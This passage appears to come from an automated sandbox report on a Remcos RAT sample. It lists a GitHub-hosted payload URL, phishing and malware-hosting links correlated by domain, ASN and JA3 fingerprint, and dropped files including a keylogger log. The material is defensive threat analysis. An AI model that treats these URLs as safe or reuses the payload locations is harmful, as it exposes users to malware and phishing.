                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                s-part-0016.t-0009.t-msedge.nethttps://1drv.ms/o/c/fdad16d5f2338a27/Eo8O_nGS-PdFnAhpolmsW1cBd-Jv5WSSl5AjZZuAQUSXNw?e=5%3aI9hXvq&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                • 13.107.246.44
                                                                                https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNxGet hashmaliciousHTMLPhisherBrowse
                                                                                • 13.107.246.44
                                                                                https://tecvia.ladesk.com/412763-SICHERE-GESCH%C3%84FTSDOKUMENTEGet hashmaliciousHTMLPhisherBrowse
                                                                                • 13.107.246.44
                                                                                Play_VM-Now(Tina.lawvey)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 13.107.246.44
                                                                                Swift_ach Complaints.sppgCQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 13.107.246.44
                                                                                http://microsoft.biosency.com/Get hashmaliciousUnknownBrowse
                                                                                • 13.107.246.44
                                                                                https://index-html.info/?rid=jhOgcp4Get hashmaliciousUnknownBrowse
                                                                                • 13.107.246.44
                                                                                CLQD.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                • 13.107.246.44
                                                                                https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.44
                                                                                https://0610ddce8f18f5a435e0067c7ddb3ec6.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 13.107.246.44
                                                                                raw.githubusercontent.comPO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.111.133
                                                                                Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                • 185.199.110.133
                                                                                UfsYHroDY1.rtfGet hashmaliciousFormBookBrowse
                                                                                • 185.199.110.133
                                                                                8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                • 185.199.110.133
                                                                                A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                Airwaybill#0587340231024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                • 185.199.110.133
                                                                                Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.108.133
                                                                                paste.eeFAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.96.3
                                                                                SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.97.3
                                                                                Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.96.3
                                                                                sostener.vbsGet hashmaliciousNjratBrowse
                                                                                • 188.114.97.3
                                                                                sostener.vbsGet hashmaliciousXWormBrowse
                                                                                • 188.114.96.3
                                                                                NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.96.3
                                                                                risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                                                                • 188.114.97.3
                                                                                NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 188.114.97.3
                                                                                o45q0zbdwt.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                • 188.114.97.3

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUS6BTZGMvUv1.elfGet hashmaliciousUnknownBrowse
                                                                                • 104.210.188.92
                                                                                MOfHb44mph.elfGet hashmaliciousUnknownBrowse
                                                                                • 52.243.82.1
                                                                                https://forms.office.com/Pages/ResponsePage.aspx?id=4mPIUn7HtEOifSf_jkD9akHPEdQOqpJDoTs5yuUf8txUMEFQTE42TU03SUJBSU84VTY3MEtFR1JaUS4uGet hashmaliciousHTMLPhisherBrowse
                                                                                • 40.126.31.69
                                                                                https://url.us.m.mimecastprotect.com/s/8I0_CKrkVEt48y6BzfMfWF5hBIN?domain=woems-my.sharepoint.comGet hashmaliciousUnknownBrowse
                                                                                • 52.98.179.34
                                                                                https://t.co/dvIdjH2XsvGet hashmaliciousUnknownBrowse
                                                                                • 40.114.177.156
                                                                                https://go.hginsights.com/rs/214-HYO-692/images/HGGet hashmaliciousUnknownBrowse
                                                                                • 13.107.42.14
                                                                                faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                • 204.79.197.203
                                                                                https://lillian.ru.com/9?ai=xdGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.45
                                                                                faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                • 204.79.197.203
                                                                                https://1drv.ms/o/c/fdad16d5f2338a27/Eo8O_nGS-PdFnAhpolmsW1cBd-Jv5WSSl5AjZZuAQUSXNw?e=5%3aI9hXvq&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                • 52.108.8.12
                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUS6BTZGMvUv1.elfGet hashmaliciousUnknownBrowse
                                                                                • 104.210.188.92
                                                                                MOfHb44mph.elfGet hashmaliciousUnknownBrowse
                                                                                • 52.243.82.1
                                                                                https://forms.office.com/Pages/ResponsePage.aspx?id=4mPIUn7HtEOifSf_jkD9akHPEdQOqpJDoTs5yuUf8txUMEFQTE42TU03SUJBSU84VTY3MEtFR1JaUS4uGet hashmaliciousHTMLPhisherBrowse
                                                                                • 40.126.31.69
                                                                                https://url.us.m.mimecastprotect.com/s/8I0_CKrkVEt48y6BzfMfWF5hBIN?domain=woems-my.sharepoint.comGet hashmaliciousUnknownBrowse
                                                                                • 52.98.179.34
                                                                                https://t.co/dvIdjH2XsvGet hashmaliciousUnknownBrowse
                                                                                • 40.114.177.156
                                                                                https://go.hginsights.com/rs/214-HYO-692/images/HGGet hashmaliciousUnknownBrowse
                                                                                • 13.107.42.14
                                                                                faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                • 204.79.197.203
                                                                                https://lillian.ru.com/9?ai=xdGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.45
                                                                                faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                • 204.79.197.203
                                                                                https://1drv.ms/o/c/fdad16d5f2338a27/Eo8O_nGS-PdFnAhpolmsW1cBd-Jv5WSSl5AjZZuAQUSXNw?e=5%3aI9hXvq&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                • 52.108.8.12
                                                                                FASTLYUSPO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.111.133
                                                                                Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                https://iasitvlife.roGet hashmaliciousUnknownBrowse
                                                                                • 151.101.66.217
                                                                                https://iasitvlife.ro/stiri/local/a-sunat-la-call-center-anticoruptie-si-a-denuntat-un-functionar-public/Get hashmaliciousHTMLPhisherBrowse
                                                                                • 199.232.192.193
                                                                                PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                https://t.co/dvIdjH2XsvGet hashmaliciousUnknownBrowse
                                                                                • 199.232.188.159
                                                                                http://185.95.84.78/rd/4gmsyP17223JZmx332lihotmtcwn9842ZSCGIOAIIATLJCU85240TITV3606d9Get hashmaliciousPhisherBrowse
                                                                                • 151.101.65.44
                                                                                faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                • 199.232.214.172
                                                                                PRODUCTTS SPECIFICATIONS.shtmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.194.137
                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUS6BTZGMvUv1.elfGet hashmaliciousUnknownBrowse
                                                                                • 104.210.188.92
                                                                                MOfHb44mph.elfGet hashmaliciousUnknownBrowse
                                                                                • 52.243.82.1
                                                                                https://forms.office.com/Pages/ResponsePage.aspx?id=4mPIUn7HtEOifSf_jkD9akHPEdQOqpJDoTs5yuUf8txUMEFQTE42TU03SUJBSU84VTY3MEtFR1JaUS4uGet hashmaliciousHTMLPhisherBrowse
                                                                                • 40.126.31.69
                                                                                https://url.us.m.mimecastprotect.com/s/8I0_CKrkVEt48y6BzfMfWF5hBIN?domain=woems-my.sharepoint.comGet hashmaliciousUnknownBrowse
                                                                                • 52.98.179.34
                                                                                https://t.co/dvIdjH2XsvGet hashmaliciousUnknownBrowse
                                                                                • 40.114.177.156
                                                                                https://go.hginsights.com/rs/214-HYO-692/images/HGGet hashmaliciousUnknownBrowse
                                                                                • 13.107.42.14
                                                                                faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                • 204.79.197.203
                                                                                https://lillian.ru.com/9?ai=xdGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.45
                                                                                faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                • 204.79.197.203
                                                                                https://1drv.ms/o/c/fdad16d5f2338a27/Eo8O_nGS-PdFnAhpolmsW1cBd-Jv5WSSl5AjZZuAQUSXNw?e=5%3aI9hXvq&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                • 52.108.8.12

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                1138de370e523e824bbca92d049a3777file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 23.1.237.91
                                                                                Full Litigation File.pdfGet hashmaliciousUnknownBrowse
                                                                                • 23.1.237.91
                                                                                http://144.126.159.102Get hashmaliciousUnknownBrowse
                                                                                • 23.1.237.91
                                                                                http://144.126.159.102:8080/loaderGet hashmaliciousUnknownBrowse
                                                                                • 23.1.237.91
                                                                                http://advertising-copyright-review.d64x5m2z8s6x8.amplifyapp.comGet hashmaliciousUnknownBrowse
                                                                                • 23.1.237.91
                                                                                https://ciportal.com/readpost/#/Wqm6_nG21k6YrjjpJ-DO-Q?mode=1&sourceid=aur8acP7cUuxs7qsn9BLQAGet hashmaliciousUnknownBrowse
                                                                                • 23.1.237.91
                                                                                https://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80hGet hashmaliciousUnknownBrowse
                                                                                • 23.1.237.91
                                                                                https://forms.office.com/Pages/ResponsePage.aspx?id=jaN4D1QdnUmjl-7H_1bQ8BO657KscNpIkpSrHR5X2rVUREFWQU02TDk1UDlBSjlUTUNVNkhKQUxPWS4uGet hashmaliciousUnknownBrowse
                                                                                • 23.1.237.91
                                                                                http://masdeliveryusa.com/Get hashmaliciousUnknownBrowse
                                                                                • 23.1.237.91
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 23.1.237.91
                                                                                28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                WinLnk.PXJ!MTB' in file 'SadeemPC.com.URL', preventing attempted open by 'ntoskrnl.urlGet hashmaliciousUnknownBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                Reff_Daiichi-sankyo_8580930869_n6T8Tseqk6.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                Your Document-7617432882-8AhEHNmrLR Ready.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                https://www.google.de/url?q=8Oshpephqbbshop&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=XS40i2Jop98hjgaswD&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkOuteybdtwrQvao&ved=HXUursu8uE=&url=amp%2Fgvhs2020.com%2Fgtaowpqtwp%3Fe%3Dhttps%3A%2F%2Foutlook.office.comGet hashmaliciousUnknownBrowse
                                                                                • 4.175.87.197
                                                                                • 13.107.246.60
                                                                                3b5074b1b5d032e5620f69f9f700ff0eyvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                TRANSFERENCIAS.vbsGet hashmaliciousFormBookBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                TRANSFERENCIAS.vbsGet hashmaliciousFormBookBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                Payment Advice Note.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133
                                                                                Transfer.lnkGet hashmaliciousHTMLPhisherBrowse
                                                                                • 188.114.97.3
                                                                                • 185.199.110.133

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.8531078571693577
                                                                                Encrypted:false
                                                                                SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugW:gJjJGtpTq2yv1AuNZRY3diu8iBVqFZ
                                                                                MD5:3EFC322D44BFE52AFAAFC854C73EEC39
                                                                                SHA1:770F779A68A20FC3086348A9FCEC1F099B1BB538
                                                                                SHA-256:E51924D8997D40A8332BEEC63492B6F2387539E41DAF53CB348A86A716A3B5EC
                                                                                SHA-512:9C2635CCAA0D0D916EE73E79FD82905C074156DFC2CB897051D5347EF5BA8EFFD1FF142FBE5669BF34DF1C1995E650550622985FC27CE2812B6A063952308492
                                                                                Malicious:false
                                                                                Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb1e5c325, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.6585919109289479
                                                                                Encrypted:false
                                                                                SSDEEP:1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                MD5:0DBEA623F1FFACA6AAD1D446C2EE2526
                                                                                SHA1:DCB9759CD7BEDAA214024A62FDF15AD115B76414
                                                                                SHA-256:321B28BBAA3945BD35B3B335A2F18E6F369AB6BE27F503711DE5CB6BEC82B3DC
                                                                                SHA-512:D84E949DF4FDB062CDA860B51B74B96A608BB78E73D85E1462088E16826E6D6315C936E98901E47347BBA5CBF4E756204B1E08B461ACC5AEB3EF816475AD7B93
                                                                                Malicious:false
                                                                                Preview:...%... ...............X\...;...{......................0.z..........{..9!...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................Vd.H9!...|..................w..9!...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                Download File
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.08091830128770645
                                                                                Encrypted:false
                                                                                SSDEEP:3:1Sl/EYerkHhVGuAJkhvekl1/zF/allrekGltll/SPj:E6zrEbrxlCJe3l
                                                                                MD5:54A5759721AD04DF5615AE8834451A35
                                                                                SHA1:CA6ABF5C2DC8A8F93371BFD8422B58CBF79E5760
                                                                                SHA-256:CE11F5DFE253ABAE60AC02B73144EFB0E83E05D26AACE50B00B0A5B78F318236
                                                                                SHA-512:5D1F33412EE094C8173B8578AEC6C792EF5D9F5F3E40E9123C479F6EA5A7D53C4A2B31980812E953277F0BC015EDAE065D324AE7A98C734F4157DBF82CB254C4
                                                                                Malicious:false
                                                                                Preview:...^.....................................;...{..9!...|.......{...............{.......{...XL......{...................w..9!...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\remcos\logs.dat

                                                                                Download File
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):12620
                                                                                Entropy (8bit):3.450862880059252
                                                                                Encrypted:false
                                                                                SSDEEP:192:dunusunuXuUunufunuXunuEufunuXuUunukunucunuUunuH6unuJ:4
                                                                                MD5:5998B78C27D6A7E39823890F126F54F0
                                                                                SHA1:410CDE188982803B9A79164D696D1890CA2289B6
                                                                                SHA-256:A33F1FACFCD099A42E96022C4C236077F1FF00A3CA69064707116F9D1FAEC63F
                                                                                SHA-512:039852C5B8BB6479B4DB3D9BBEA312210276E42E5FA74CAA334F2E5EA5CB9B920B57360D47E395B85B98C5EF57E314094C50B0BABA2D2A9FB4C22C9F0B2864E1
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                Preview:....[.2.0.2.4./.1.0./.0.4. .0.5.:.3.3.:.5.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.s.v.c.h.o.s.t...e.x.e.].........[.s.v.c.h.o.s.t...e.x.e. .-. .T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d...].........[.U.n.t.i.t.l.e.d. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.F.i.x. ...N.E.T. .F.r.a.m.e.w.o.r.k. .'.T.h.i.s. .a.p.p.l.i.c.a.t.i.o.n. .c.o.u.l.d. .n.o.t. .b.e. .s.t.a.r.t.e.d.'. .-. ...N.E.T. .

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Preview:@...e...........................................................

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ifvlxbh.5u0.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5avviu1a.yux.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kveck0rz.0zi.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3iz5jqp.rtb.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxrxvq1y.b0m.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yatzni5m.cvg.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

